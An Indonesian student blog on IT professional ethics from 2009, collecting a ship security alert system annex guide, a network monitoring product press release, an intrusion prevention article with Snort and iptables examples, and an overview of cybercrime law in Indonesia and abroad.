THOUSANDS OF FREE BLOGGER TEMPLATES
Selamat datang di blog etika profesi IT !!!!!!!!!

Selasa, 24 November 2009

Para Pembuat Blog:
Ulung Spartacus S            18070952

Uus Setiawan                    18070951

Harry Fajar                       18070944

Rian Rinaldi                      18070957

Aris Setiawan                    18070921

Ujang Sodikin                    18070972

Mega Gumilang                 18070998







Senin, 23 November 2009

Guidance for Writing a Ship Security Alert System Annex for a Vessel Security Plan




1. System Details
a. How is the system activated? Describe the method of activation for each activation switch and
describe how inadvertent activation is prevented.
b. Where is the system located? Provide the location for each individual component of the SSAS,
excluding wires. Space names are sufficient.
c. Does the system have proper structural fire protection? The components of the system should be
located in a low fire risk compartment and protected in a manner that prevents system malfunction
due to heat or fire.
d. Who is authorized access to SSAS annex to VSP? State the name and/or title of persons who will
have access to the SSAS annex.
e. Who is authorized to activate system? If system activation is restricted to certain individuals,
state the name and/or title of these individuals and the reason for the restriction.
f. False alarm handling/Authentication. Describe the method for which false alarms will be handled
(i.e. reporting to RCC) and how alerts will be authenticated.
g. Physical security of system. How will the integrity (concealment) of the onboard system be
maintained and verified.
h. Company shore side contacts/Registrations. A copy of the required registration form should be
included in the SSAS annex.
i. Method of notifying vessel crew of activation. Specify if, but NOT how, you are planning on
notifying the crew of activation by covert methods.
j. Incident Report. A copy of the vessel’s SSAS post-incident report form must be included in the
SSAS annex.
k. Testing Policy. Provide details for when, how, and under what parameters the SSAS will be
tested. (i.e. who will test, how often, what actions will entail testing)
2. Competent Authority
a. Contact Information. Provide the name, address, and phone number for the Competent Authority.
b. Availability. The Competent Authority must be available to carry out his/her duties (24/7).
c. Duties. Provide details of all SSAS related duties of the Competent Authority. How does the
Competent Authority convey the alert to RCC Alameda?
3. Service Provider
a. Provide the name and contact information for the Communications Service Provider (CSP) used
for the SSAS. If the CSP is non-GMDSS-based, it must be accepted by the U. S. Coast Guard. See
the SSAS enclosure of NVIC 4-03 for further direction on CSP acceptance.
4. Message Chain
a. Detail the path of the message after the SSAS is activated. This should be a narrative of what
form the message is in, where the message is going, and what form it is being transmitted in.
5. Wire Diagram
a. Submit a complete wire and cable installation drawing with, but separated from, the SSAS annex
submission. All wiring and cabling installation should be done in accordance with 46 CFR 111.60.
6. Technical Specifications
a. How does the system work? Annotate how the Competent Authority receives the message.
b. Maintenance. Provide the manufacturers recommended maintenance schedule (if any).
c. Power Sources. Identify and describe the primary and backup source of power. See the SSAS
enclosure of NVIC 4-03 for further guidance on power source configuration.
d. System Reset Policy. Detail how the system will be reset following testing and actual alerts.
e. Parts List. Provide the manufacturers list of parts for the system onboard the vessel.

A-Enterprise Alert System Revolusi dalam Sistem Manajemen



Jakarta - PT Adinoto Indonesia, beberapa waktu lalu meluncurkan sistem pemantauan jaringan "A-Enterprise® Alert System" (AEAS). Sistem ini merevolusionerkan bagaimana perusahaan memanaje sistem dengan memberikan solusi pemantauan jaringan pada perusahaan-perusahaan yang menerapkan " e-business solution". Seiring dengan berkembangnya trend e-Business, jaringan menjadi hal yang sangat menjadi penopang dalam operasional perusahaan, e -Business infrastructure, data center dan 24 jam transaksi. Jadi dapat terlihat bahwa penilaian perusahaan mana yang membutuhkan system ini bukan dilihat dari jumlah klien atau besar kecilnya perusahaan, namun dilihat dari perusahaan yang telah memiliki jaringan yang cukup banyak. Inilah yang membedakan antara e- Business yang akan sukses atau yang akan gagal.
A-Enterprise memberikan solusi manajemen alert system yang handal untuk jaringan di perusahaan yang terjun dalam "e - Business solution". Melalui sistem pemantauan yang handal ini, A-Enterprise® memelihara server jaringan untuk menyediakan "ongoing availability", mengoptimalkan kinerja jaringan dan memanaje "jaringan" dalam bisnis konteks.
AEAS merupakan sistem yang handal tidak hanya dalam bidang mencari masalah yang ada pada server jaringan tetapi juga handal dalam mencari web-connection, power failure dan masalah suhu ruangan dalam waktu yang singkat dan akurat. AEAS dalam pengoperasiannya tidak dalam server -nya sendiri, namun menggunakan Linuz based server secara terpisah. Selain memberikan fasilitas yang handal tetapi juga akan menjamin bahwa server jaringan akan beroperasi mulus sepanjang waktu. Ini juga berarti bahwa bisnis akan berjalan lancar karena sistem ini akan mengurangi down-time dan membuat perusahaan akan berkonsentrasi terhadap kegiatan bisnis mereka. "Kami mencoba memberikan sistem untuk mengamankan sistem server anda dengan memanaje dan memonitor sistem anda," ujar Adinoto A. Kadir, CEO PT. AI pada saat peluncuran.
Cara kerja The Alert System, AEAS akan secara otomatis mengetahui masalah sehubungan dengan server jaringan yang menggunakan TCP/IP protocol, Web connections,
power failure dan suhu ruangan, mencatat sistem down-time, dan membangun history log ditujukan kepada administrator jaringan melalui SMS (Short Messaging System) GSM Mobile
Phone atau e-mail. Pada saat alert system mengetahui ada kegagalan pada jaringan, sistem ini akan terhubung dengan "Notifiers". Notifiers dapat dikonfigurasi untuk mengirim email, mengirim informasi dalam melalui web page atau mengirim sms melalui telepon selular.
Notifiers juga dapat mengambil tindakan untuk menjalankan kembali server yang terganggu. Notifiers juga dapat diset untuk memberitahukan anda kapan server tersebut harus kembali diservis, mengambil tindakan sesuai dengan prioritas alert, atau dapat dijadwalkan sehingga mendapatkan tindakan yang tepat pada waktu yang tepat.
AEAS memberikan banyak keuntungan untuk perusahaan yang mengaplikasikan sistem ini, diantaranya menghemat biaya usaha, mengamankan asset dan business opportunity, mempercepat waktu respon terhadap masalah pada jaringan sehingga mengurangi waktu down-time yang dapat berdampak pada kelancaran berbisnis, tidak memerlukan banyak personil untuk memonitor server dikarenakan hal ini secara otomatis dihandle oleh AEAS.
Kelebihan yang lain adalah AEAS memberikan kemudahan memonitor jaringan dimana dan darimana saja, dan dengan harga terjangkau. Harga untuk mengaplikasikan sms gateaway, anda akan mendapatkan perangkat keras sekaligus dengan akuisisinya, monitoring software dan juga pelatihan tentang pengoperasian sistem ini. "System ini cukup inovatif dan cukup terjangkau dilihat dari kondisi pasar saat ini," kata salah satu undangan yang hadir dalam peluncuran ini.
Saat ini PT. AI sudah memasang sistem ini dibeberapa perusahaan dan institusi pemerintahan seperti RisTI Telkom, yang juga menjadi mitra perusahaan. Kemitraan lain yang juga dijalin oleh PT. AI antara lain dengan PT. NSI (PT. Dirgantara Indonesia - anak perusahaan IPTN), sector pemerintahan dan indusri gas dan minyak. Beberapa pihak asing sudah dalam tahap negosiasi untuk akuisisi, minat dan prospek yang luas bagi berkembangnya sektor manajemen jaringan dan keandalan sistem ini. (Heru Sutadi)

Sistem Pencegah Penyusupan

Sistem Pencegahan Penyusupan (Intrusion Preventing System atau IPS) adalah suatu tools yang digunakan untuk mencegah adanya penyusupan. Ada 2 fungsi dalam IPS yakni kemampuan mendeteksi penyusupan dan kemampuan untuk mencegah akses penyusupan.Kemampuan mendeteksi penyusupan secara umum disebut IDS (Instrusion Detection System) dan kemampuan untuk mencegah akses dikenal dengan Firewall. Komponen Sistem Pencegahan PenyusupanSistem pencegahan penyusupan harus dapat mendeteksi dan merespon terhadap penyusupan yakni dengan mengkonfigurasi ulang rule firewall yang ada. Untuk itu komponen-komponen yang harus ada pada sistem pencegahan penyusupan meliputi:
• IDS (Intrusion Detection System).
Dilihat dari cara kerja dalam menganalisa apakah paket data dianggap sebagai penyusupan atau bukan, IDS dibagi menjadi 2:knowledge based atau misuse detection dan behavior based atau anomaly based. Knowledge-based IDS dapat mengenali adanya penyusupan dengan cara menyadap paket data kemudian membandingkannya dengan database rule IDS (berisi catatan paket serangan). Jika paket data mempunyai pola yang sama dengan salah satu atau lebih pola di database rule IDS, maka paket tersebut dianggap sebagai serangan, dan demikian juga sebaliknya, jika paket data tersebut sama sekali tidak mempunyai pola yang sama dengan pola di database rule IDS, maka paket data tersebut dianggap bukan serangan.
Sedangkan behavior based (anomaly) dapat mendeteksi adanya penyusupan dengan mengamati adanya kejanggalan-kejanggalan pada sistem, atau adanya penyimpangan-penyimpangan dari kondisi
normal, sebagai contoh ada penggunaan memori yang melonjak secara terus menerus atau ada koneksi parallel dari 1 buah IP dalam jumlah banyak dan dalam waktu yang bersamaan. Kondisi-kondisi diatas
dianggap kejanggalan yang kemudian oleh IDS jenis anomaly based dianggap sebagai serangan.
Sedangkan dilihat dari kemampuan mendeteksi penyusupan pada jaringan, IDS dibagi menjadi 2 yakni: host based dan network based.
Host based mampu mendeteksi hanya pada host tempat implementasi IDS, sedangkan network based IDS mampu mendeteksi seluruh host yang berada satu jaringan dengan host implementasi IDS tersebut. Tulisan ini secara khusus menggunakan IDS jenis knowledge based dan network based.
• Packet Filtering Firewall.
Packet Filtering Firewall dapat membatasi akses koneksi berdasarkan parameter-parameter: protokol, IP asal, IP tujuan, port asal, port tu-juan, chain (aliran data) dan code bit sehingga dapat diatur hanya akses yang sesuai dengan policy saja yang dapat mengakses sistem. Packet filtering firewall ini bersifat statik sehingga fungsi untuk membatasi aksespun statik, misalnya akses ke web server (port 80) di-ijinkan oleh policy, maka dari manapun dan apapun aktifitas terhadap webserver diijinkan walaupun merupakan usaha penetrasi oleh craker. Untuk itulah packet filtering firewall tidak dapat mengatasi gangguan yang bersifat dinamik sehingga harus dikombinasikan dengan IDS untuk membentuk sistem hardening yang maksimal.
• Engine Sistem Pencegahan Penyusupan (IDS-Firewall).
Engine ini bertugas untuk membaca alert dari IDS (antara lain berupa jenis serangan dan IP Address penyusup) untuk kemudian memerintahkan firewall untuk memblok akses koneksi ke sistem dari penyusup tersebut.
Dimana diletakkan Sistem Pencegahan Penyusupan?
Sistem pencegahan penyusupan akan maksimal jika diletakkan di router sehingga daerah kerja sistem ini dapat mencakup semua host yang berada dalam 1 jaringan dengan router tempat mengimplementasikan Sistem Pencegahan Penyusupan. Masalah timbul ketika konsentrator menggunakan switch dimana proses penyadapan yang harus dilakukan dalam proses deteksi penyusupan menjadi tidak berfungsi, salah satu cara yang mudah untuk mengatasi masalah ini adalah dengan melakukan spoofing MAC address terhadap host-host yang akan diamati. Posisi sistem pencegahan penyusupan untuk menghasilkan hasil yang maksimal.
Sistem Pencegahan Penyusupan berupa IDS dan Firewall yang diimplementasikan di router/gateway antara internet-DMZ digunakan untuk melindungi server-server yang berada di wilayah DMZ dari kemungkinan serangan dari internet, sedangkan yang diimplentasikan antara jaringan DMZ-intranet digunakan untuk melindungi kemungkinan serangan dari intranet ke wilayah DMZ maupun internet.Snort IDS dan IPTables Firewall
Seperti dijelaskan sebelumnya, sistem pencegahan penyusupan dibangun dari 2 komponen utama yakni IDS dan Firewall. Dalam pembahasan ini, IDS yang digunakan adalah Snort (www.snort.org) sedangkan firewall yang digunakan adalah Iptables yang merupakan firewall bawaan Linux.
Snort IDS
Snort IDS merupakan IDS open source yang secara defacto menjadi standar IDS di industri. Snort dapat didownload di situs www.snort.org. Snort dapat diimplementasikan dalam jaringan yang multiplatform, salah satu kelebi-hannya adalah mampu mengirimkan alert dari mesin Unix atupun Linux ke platform Microsoft Windows dengan melalui SMB. Snort dapat berkerja dalam 3 mode: sniffer
mode (penyadap), packet logger dan network intrusion detection mode. Tentunya mode kerja yang akan digunakan dalam membangun sistem pencegahan penyusupan dalam mode kerja network intrusion
dection. Penyusupan (intrusion) didefinisikan sebagai kegiatan yang bersifat anomaly, incorrect atau inappropriate yang terjadi di jaringan atau di host.
Komponen-komponen Snort IDS meliputi:
• Rule Snort
Rule Snort merupakan database yang berisi pola-pola serangan berupa signature jenis-jenis serangan. Rule Snort IDS ini, harus diupdate secara rutin agar ketika ada suatu teknik serangan yang baru, serangan tersebut dapat terdeteksi. Rule Snort dapat didownload di www.snort.org.
Dari rule-rule seperti di ataslah IDS Snort menentukan apakah sebuah paket data dianggap sebagai penyusupan/serangan atau bukan, paket data dibandingkan dengan rule IDS, jika terdapat dalam rule, maka paket data tersebut dianggap sebagai penyusupan/serangan dan demikian juga sebaliknya jika tidak ada dalam rule maka dianggap bukan penyusupan/serangan.
• Snort Engine
Snort Engine merupakan program yang berjalan sebagai daemon proses yang selalu bekerja untuk membaca paket data dan kemudian mem-bandingkannya dengan rule Snort. Dalam sistem Linux, untuk
mende-teksi apakah snort engine dalam keadaan aktif atau tidak dengan melihat prosesnya seperti contoh di bawah ini:
[root@localhost rules] # ps aux | grep snort
root 3060 0.0 1.3 9188 820 ? S Jun03 0:04 [snort]
Contoh diatas menunjukkan bahwa snort engine dalam keadaan aktif dengan proses ID 3060 dan dijalankan oleh user "root"
• Alert
Alert merupakan catatan serangan pada deteksi penyusupan. Jika snort engine menghukumi paket data yang lewat sebagai serangan, maka snort engine akan mengirimkan alert berupa log file. Untuk kebutuhan analisa, alert dapat disimpan di dalam database, sebagai contoh ACID (Analysis Console for Intrusion Databases) sebagai modul tambahan pada Snort.
Contoh alert sebagai berikut:
[**] [1:499:3] ICMP Large ICMP Packet [**] [Classification:
Potentially Bad Traffic] [Priority: 2] 05/09-20:15:14. 895348
10.1.4.113 -> 10.1.3.126 ICMP TTL:128 TOS:0x0 ID:6316
IpLen:20 DgmLen:65528 Type:8 Code:0 ID:512 Seq:3072 ECHO
[Xref => http://www.whitehats.com/info/IDS246]
Contoh alert di atas merupakan alert ketika terdapat paket data dalam ukuran besar dari IP Address 10.1.4.113 ke 10.1.3.126 yang dianggap sebagai serangan oleh Snort karena pola paket data tersebut terdapat dalam rule Snort.
Hubungan ketiga komponen IDS dijelaskan dalam gambar berikut:

IPTables Firewall
IPTables merupakan firewall bawaan Linux. Iptables mampu melakukan filtering dari layer transport sampai layer fisik. Sebagai contoh rule dalam sebuah firewall akan menutup semua koneksi kecuali ke port 80 protokol TCP, atau sebuah rule firewall mendefiniskan bahwa yang dapat melakukan koneksi hanya paket data yang berasal dari MAC address 00-80-48-24-3b-e5. Variabel-variabel dalam Iptables Firewall meliputi:
• Protokol, contoh: tcp, udp, icmp
• Port asal, contoh: port yang lebih besar dari 1023
• Port tujuan, contoh: port 21, 22, 80
• IP asal/Jaringan asal: contoh 202.91.8.112, 202.62.9.216/28
• IP tujuan/Jaringan tujuan: contoh 202.91.8.112,202.62.9.216/28
• Chain (aliran), contoh: INPUT, OUTPUT, FORWARD (khusus router)
• Code bit (flag), contoh: SYN, ACK.
Contoh rule firewall pada Iptables sebagai berikut:
iptables -A FORWARD -p tcp -d 202.91.8.112 —dport 80 –j ACCEPT
iptables -A FORWARD -p tcp -d 202.91.8.112 -j DROP
Rule di atas mendefinisikan bahwa semua paket data dengan protocol tcp dari manapun yang menuju 202.91.8.112 ditolak semua kecuali yang menuju ke port 80.

Cyber Crime dan Pengaruhnya Terhadap Dunia Bisnis



I.1 Regulasi tenang cyber crime yang ada di indonesia
Untuk saat ini Indonesia belum memiliki Undang-Undang khusus/cyber law yang mengatur mengenai cybercrime walaupun rancangan undang-undang tersebut sudah ada sejak tahun 2000 dan revisi terakhir dari rancangan undang-undang tindak pidana di bidang teknologi informasi sejak tahun 2004 sudah dikirimkan ke Sekretariat Negara RI oleh Departemen Komunikasi dan Informasi serta dikirimkan ke DPR namun dikembalikan kembali ke Departemen Komunikasi dan Informasi untuk diperbaiki. Tetapi, terdapat beberapa hukum positif lain yang berlaku umum dan dapat dikenakan bagi para pelaku cybercrime terutama untuk kasus-kasus yang menggunakan komputer sebagai sarana, antara lain:
a. Kitab Undang Undang Hukum Pidana
Dalam upaya menangani kasus-kasus yang terjadi, para penyidik melakukan analogi atau perumpamaan dan persamaaan terhadap pasal-pasal yang ada dalam KUHP. Pasal-pasal didalam KUHP biasanya digunakan lebih dari satu Pasal karena melibatkan beberapa perbuatan sekaligus pasal-pasal yang dapat dikenakan dalam KUHP pada cybercrime antara lain :
1) Pasal 362 KUHP yang dikenakan untuk kasus carding dimana pelaku mencuri nomor kartu kredit milik orang lain walaupun tidak secara fisik karena hanya nomor kartunya saja yang diambil dengan menggunakan software card generator di Internet untuk melakukan transaksi di e-commerce. Setelah dilakukan transaksi dan barang dikirimkan, kemudian penjual yang ingin mencairkan uangnya di bank ternyata ditolak karena pemilik kartu bukanlah orang yang melakukan transaksi.
2) Pasal 378 KUHP dapat dikenakan untuk penipuan dengan seolah-olah menawarkan dan menjual suatu produk atau barang dengan memasang iklan di salah satu website sehingga orang tertarik untuk membelinya lalu mengirimkan uang kepada pemasang iklan. Tetapi, pada kenyataannya, barang tersebut tidak ada. Hal tersebut diketahui setelah uang dikirimkan dan barang yang dipesankan tidak datang sehingga pembeli tersebut menjadi tertipu.
3) Pasal 335 KUHP dapat dikenakan untuk kasus pengancaman dan pemerasan yang dilakukan melalui e-mail yang dikirimkan oleh pelaku untuk memaksa korban melakukan sesuatu sesuai dengan apa yang diinginkan oleh pelaku dan jika tidak dilaksanakan akan membawa dampak yang membahayakan. Hal ini biasanya dilakukan karena pelaku biasanya mengetahui rahasia korban.
4) Pasal 311 KUHP dapat dikenakan untuk kasus pencemaran nama baik dengan menggunakan media Internet. Modusnya adalah pelaku menyebarkan e-mail kepada teman-teman korban tentang suatu cerita yang tidak benar atau mengirimkan e-mail ke suatu mailing list sehingga banyak orang mengetahui cerita tersebut.
5) Pasal 303 KUHP dapat dikenakan untuk menjerat permainan judi yang dilakukan secara online di Internet dengan penyelenggara dari Indonesia.
6) Pasal 282 KUHP dapat dikenakan untuk penyebaran pornografi maupun website porno yang banyak beredar dan mudah diakses di Internet. Walaupun berbahasa Indonesia, sangat sulit sekali untuk menindak pelakunya karena mereka melakukan pendaftaran domain tersebut diluar negri dimana pornografi yang menampilkan orang dewasa bukan merupakan hal yang ilegal.
7) Pasal 282 dan 311 KUHP dapat dikenakan untuk kasus penyebaran foto atau film pribadi seseorang yang vulgar di Internet , misalnya kasus Sukma Ayu-Bjah.
8) Pasal 378 dan 262 KUHP dapat dikenakan pada kasus carding, karena pelaku melakukan penipuan seolah-olah ingin membeli suatu barang dan membayar dengan kartu kreditnya yang nomor kartu kreditnya merupakan curian.
9) Pasal 406 KUHP dapat dikenakan pada kasus deface atau hacking yang membuat sistem milik orang lain, seperti website atau program menjadi tidak berfungsi atau dapat digunakan sebagaimana mestinya.
b.Undang-Undang No 19 Tahun 2002 tentang Hak Cipta.
Menurut Pasal 1 angka (8) Undang-Undang No 19 Tahun 2002 tentang Hak Cipta, program komputer adalah sekumpulan intruksi yang diwujudkan dalam bentuk bahasa, kode, skema ataupun bentuk lain yang apabila digabungkan dengan media yang dapat dibaca dengan komputer akan mampu membuat komputer bekerja untuk melakukan fungsi-fungsi khusus atau untuk mencapai hasil yang khusus, termasuk persiapan dalam merancang intruksi-intruksi tersebut.
Hak cipta untuk program komputer berlaku selama 50 tahun (Pasal 30). Harga program komputer/software yang sangat mahal bagi warga negara Indonesia merupakan peluang yang cukup menjanjikan bagi para pelaku bisnis guna menggandakan serta menjual software bajakan dengan harga yang sangat murah.Misalnya, program anti virus seharga $ 50 dapat dibeli dengan harga Rp20.000,00. Penjualan dengan harga sangat murah dibandingkan dengan software asli tersebut menghasilkan keuntungan yang sangat besar bagi pelaku sebab modal yang dikeluarkan tidak lebih dari Rp 5.000,00 perkeping. Maraknya pembajakan software di Indonesia yang terkesan “dimaklumi” tentunya sangat merugikan pemilik hak cipta. Tindakan pembajakan program komputer tersebut juga merupakan tindak pidana sebagaimana diatur dalam Pasal 72 ayat (3) yaitu “Barang siapa dengan sengaja dan tanpa hak memperbanyak penggunaan untuk kepentingan komersial suatu program komputer dipidana dengan pidana penjara paling lama 5 (lima) tahun dan/atau denda paling banyak Rp500.000.000,00 (lima ratus juta rupiah)
c.Undang-Undang No 36 Tahun 1999 tentang Telekomunikasi
Menurut Pasal 1 angka (1) Undang-Undang No 36 Tahun 1999, Telekomunikasi adalah setiap pemancaran, pengiriman, dan/atau penerimaan dan setiap informasi dalam bentuk tanda-tanda, isyarat, tulisan, gambar, suara, dan bunyi melalui sistem kawat, optik, radio, atau sistem elektromagnetik lainnya. Dari definisi tersebut, maka Internet dan segala fasilitas yang dimilikinya merupakan salah satu bentuk alat komunikasi karena dapat mengirimkan dan menerima setiap informasi dalam bentuk gambar, suara maupun film dengan sistem elektromagnetik. Penyalahgunaan Internet yang mengganggu ketertiban umum atau pribadi dapat dikenakan sanksi dengan menggunakan Undang-Undang ini, terutama bagi para hacker yang masuk ke sistem jaringan milik orang lain sebagaimana diatur pada Pasal 22, yaitu Setiap orang dilarang melakukan perbuatan tanpa hak, tidak sah, atau memanipulasi:
a) Akses ke jaringan telekomunikasi
b) Akses ke jasa telekomunikasi
c) Akses ke jaringan telekomunikasi khusus
Apabila seseorang melakukan hal tersebut seperti yang pernah terjadi pada website KPU www.kpu.go.id, maka dapat dikenakan Pasal 50 yang berbunyi “Barang siapa yang melanggar ketentuan sebagaimana dimaksud dalam Pasal 22, dipidana dengan pidana penjara paling lama 6 (enam) tahun dan/atau denda paling banyak Rp600.000.000,00 (enam ratus juta rupiah)”
d.Undang-Undang No 8 Tahun 1997 tentang Dokumen Perusahaan
Dengan dikeluarkannya Undang-Undang No. 8 Tahun 1997 tanggal 24 Maret 1997 tentang Dokumen Perusahaan, pemerintah berusaha untuk mengatur pengakuan atas mikrofilm dan media lainnya (alat penyimpan informasi yang bukan kertas dan mempunyai tingkat pengamanan yang dapat menjamin keaslian dokumen yang dialihkan atau ditransformasikan). Misalnya Compact Disk –Read Only Memory (CD -ROM), dan Write -Once Read -Many (WORM), yang diatur dalam Pasal 12 Undang-Undang tersebut sebagai alat bukti yang sah.
e.Undang-Undang No 25 Tahun 2003 tentang Perubahan atas Undang-Undang
No. 15 Tahun 2002 tentang Tindak Pidana Pencucian Uang Undang-Undang ini merupakan Undang-Undang yang paling ampuh bagi seorang penyidik untuk mendapatkan informasi mengenai tersangka yang melakukan penipuan melalui Internet, karena tidak memerlukan prosedur birokrasi yang panjang dan memakan waktu yang lama, sebab penipuan merupakan salah satu jenis tindak pidana yang termasuk dalam pencucian uang (Pasal 2 Ayat (1) Huruf q). Penyidik dapat meminta kepada bank yang menerima transfer untuk memberikan identitas dan data perbankan yang dimiliki oleh tersangka tanpa harus mengikuti peraturan sesuai dengan yang diatur dalam Undang-Undang
Perbankan. Dalam Undang-Undang Pencucian Uang proses tersebut lebih cepat karena Kapolda cukup mengirimkan surat kepada Pemimpin Bank Indonesia di daerah tersebut dengan tembusan kepada Kapolri dan Gubernur Bank Indonesia, sehingga data dan informasi yang dibutuhkan lebih cepat didapat dan memudahkan proses penyelidikan terhadap pelaku, karena data yang diberikan oleh pihak bank, berbentuk: aplikasi pendaftaran, jumlah rekening masuk dan keluar serta kapan dan dimana dilakukan transaksi maka penyidik dapat menelusuri keberadaan pelaku berdasarkan data–data tersebut. Undang-Undang ini juga mengatur mengenai alat bukti elektronik atau digital evidence sesuai dengan Pasal 38 huruf b yaitu alat bukti lain berupa informasi yang diucapkan, dikirimkan, diterima, atau disimpan secara elektronik dengan alat optik atau yang serupa dengan itu.
f. Undang-Undang No 15 Tahun 2003 tentang Pemberantasan Tindak Pidana
Terorisme Selain Undang-Undang No. 25 Tahun 2003, Undang-Undang ini mengatur mengenai alat bukti elektronik sesuai dengan Pasal 27 huruf b yaitu alat bukti lain berupa informasi yang diucapkan, dikirimkan, diterima, atau disimpan secara elektronik dengan alat optik atau yang serupa dengan itu. Salah satu ketentuan yang dapat dipedomani dalam hal barang bukti Adalah ketentuan pada pasal 36 KUHAP yang mengatur tentang barang bukti yang dapat disita yaitu :
1. Benda atau tagihan tersangka / terdakwa yang seluruh atau sebagai diduga diperoleh dari tindak pidana.
2. Benda yang telah dipergunakan secara langsung untuk melakukan tindak pidana.
3. Benda yang dipergunakan untuk menghalang – halangi penyidikan.
4. Benda yang khusus dibuat atau diperuntukan melakukan tindak pidana.
5. Benda lain yang mempunyai hubungan langsung dengan tindak pidana.
Khususnya untuk kejahatan komputer dalam kegiatan perbankan maka dokumen –dokumen yang berhubungan dengan kegiatan operasional perbankan tersebut (Aplikasi transfer, Voucher, Nota Debet / Kridit dan lain – lain ).
Yang menjadi kendala adalah barang bukti berupa Sotwere yang dapat dengan mudah dihilangkan atau dirusak, maka kecepatan dan ketepatan dalam bertindak hanya dapat dilakukan oleh petugas itu sendiri dalam hal ini penyidik tidak dapat berbuat banyak, apalagi jika laporan atau kasus berikutnya setelah berselang beberapa hari atau minggu.
Perlu diketahui, bahwa komputer dikenal sebagai “ THE UNSMOKING GUN “yaitu senjata yang tidak meninggalkan bekas, tidak berhubungan langsung dengan korban, tidak menggunakan kekerasan namun dapat menimbulkan kerugian dalam jumlah yang sangat besar dalam waktu yang sangat singkat.
Memperhatikan uraian tersebut diatas, maka antisipasi ancaman dan penanggulangan Cyber Crime di Indonesia perlu dilakukan melalui pengkajian yang mendalam, terutama tentang penggunaan teknologi canggih dibidang komunikasi yang belum terwadahi dalam ketentuan perundang – undangan yang mampu memagari dan mencegah meluasnya Cyber Crime. Upaya yang dipandang perlu dalam rangka mengantisipasi terhadap meningkatnya ancaman Cyber Crime dimasa yang akan datang baik secara tehnis maupun terhadap kualitas sumber daya manusianya. Antara lain dengan mewujudkan Corporate Scurity ( Kerja sama pengamanan ) berupa pengamanan industri ( Industrial Scurity ) yang tidak saja mencakup pengamanan pabrik, tetapi diartikan secara luas termasuk perbankan, hotel , pasar swalayan, Departemen Store, Kantor Kantor Pemerintah dsb. Industrial scurity harus ditangani oleh tenaga – tenaga yg professional dan apabila hal ini diabaikan, maka Cyber Crime akan terus meningkat.
I.2 Regulasi tenang cyber crime yang ada di luar negri
Kekhawatiran akan tindak kejahatan ini dirasakan di seluruh aspek bidang kehidupan. ITAC (Information Technology Assosiation of Canada) pada “International Information Industry Congress (IIIC) 2000 Millenium Congress” di Quebec tanggal 19 September 2000 menyatakan bahwa “ Cyber crime is a real and growing threat to economic and social development around the world. Information technology touches every aspect of human life and so can electronically enable crime”.Dan yang lebih mengkhawatirkan lagi adalah bahwa belum ada kerangka yang cukup signifikan dalam peraturan perundang-undangan untuk menjerat sang pelaku di dunia cyber karena sulitnya pembuktian. Belum ada pilar hukum yang mampu menangani tindak kejahatan mayantara ini (paling tidak untuk saat ini).
Terlebih sosialisasi mengenai hukum cyber dimasyarakat masih sangat minim. Bandingkan dengan negara seperti Malaysia, Singapura atau Amerika yang telah mempunyai Undang-undang yang menetapkan ketentuan dunia cyber. Atau bahkan negara seperti India yang sudah mempunyai “polisi Cyber”. Kendati beberapa rancangan Undang-undang telah diusulkan ke DPR, namun hasil yang signifikan belum terwujud, terlebih belum tentu ada kesesuaian antara undang-undang yang akan dibuat dengan kondisi sosial yang terjadi dimasyarakat.
Referensi dari beberapa negara yang sudah menetapkan undang-undang semacam ini dirasa masih belum menjamin keberhasilan penerapan di lapangan, karena pola pemetaan yang mengatur kejahatan cyber bukan sekedar kejahatan disuatu negara, melainkan juga menyangkut kejahatan antar kawasan dan antar negara.
I.3 Regulasi tenang cyber crime yang ada di dunia
Berbagai upaya telah dipersiapkan untuk memerangi cyber crime. The Organization for Economic Co-operation and Development (OECD) telah membuat guidelines bagi para pembuat kebijakan yang berhubungan dengan computer related crime , dimana pada tahun 1986 OECD telah mempublikasikan laporan yang berisi hasil survei terhadap peraturan perundang-undangan negaranegara anggota, beserta rekomendasi perubahannya dalam menanggulangi computer related crime, yang diakui bahwa sistem telekomunikasi memiliki peran penting didalam kejahatan tersebut. Melengkapi laporan OECD, The Council of Europe (CE) berinisiatif melakukan studi mengenai kejahatan tersebut. Studi ini memberikan guidelines lanjutan bagi para pengambil kebijakan untuk menentukan tindakan-tindakan apa yang seharusnya dilarang berdasakan hukum pidana negara-negara anggota dengan tetap memperhatikan keseimbangan antara hak-hak sipil warga negara dan kebutuhan untuk melakukan proteksi terhadap computer related crime tersebut. Pada perkembangannya, CE membentuk Committee of Experts on Crime ini Cyber space of The Committee on Crime problem, yang pada tanggal 25 April 2000 telah mempublikasikan draft Convention on Cyber Crime sebagai hasil kerjanya, yang menurut Susan Brenner dari University of Daytona School of Law, merupakan perjanjian internasional pertama yang mengatur hukum pidana dan aspek proseduralnya untuk berbagai tipe tindak pidana yang berkaitan erat dengan penggunaan komputer, jaringan atau data, serta berbagai penyalahgunaan sejenis.
Ketentuan-ketentuan hukum yang ada saat ini bisa digunakan, maka pelaksanaannya akan berbeda dengan dengan penegakan di dunia hukum biasa,Khususnya mengenai apa yang harus dilakukan aparat kepolisian. Maka perlu dibentuk polisi cyber, hakim cyber, dan jaksa cyber yang keahliannya menangani cyber crime. Cyber Crime dalam konvensi Palermo tentang kejahatan transnasional merupakan bagian dari bentuk kejahatan trans nasional. Sehingga bangsa-bangsa atau negara-negara di dunia harus mematuhi konsesni ini guna menjamin hubungan yang lebih baik dengan bangsa-bangsa di dunia.kejahatan mayantara( cyber crime).Isi Konsensi Palermo kaitannya tentang Hukum Internasional mengenai CyberCrime.Konvensi Palermo memutuskan kesepakatan pada pasal 1 bertujuan ;:
“Tujuan dari konvensi palermo adalah untuk meningkatkan kerjasama dengan semua negara di dunia untuk memerangi kejahatan transnasional yang terorganisir”.Semakin jelas pahwa konvensi ini dibuat semakin merebaknya kejahatan transnasional antara lain cyber crime yang sudah merambah ke semua dunia dan bersifat meresahkan.
Pasal 2 konvensi Palermo ayat C mengisayaratkan bahwa kejahatan ini merupakan kejahatan yang serius sehingga hukuman minimal 4 tahun atau lebih” .Artinya bahwa ketentuannya pelaku kejahatan transnasional akan mendapat hukuman minimal 4 tahun penjara dalam konsensi ini. Banyaks sekali kejahatan transnasional maka yang disebut dengan hasil kejahatan adalah harta yang diperoleh secara langsung atau tidak langsung melalui bentuk pelanggaran.” Jadi yang dimaksud adalah memiliki atau mengambil barang orang lain tanpa ijin atau melalui pelanggaran hukum.
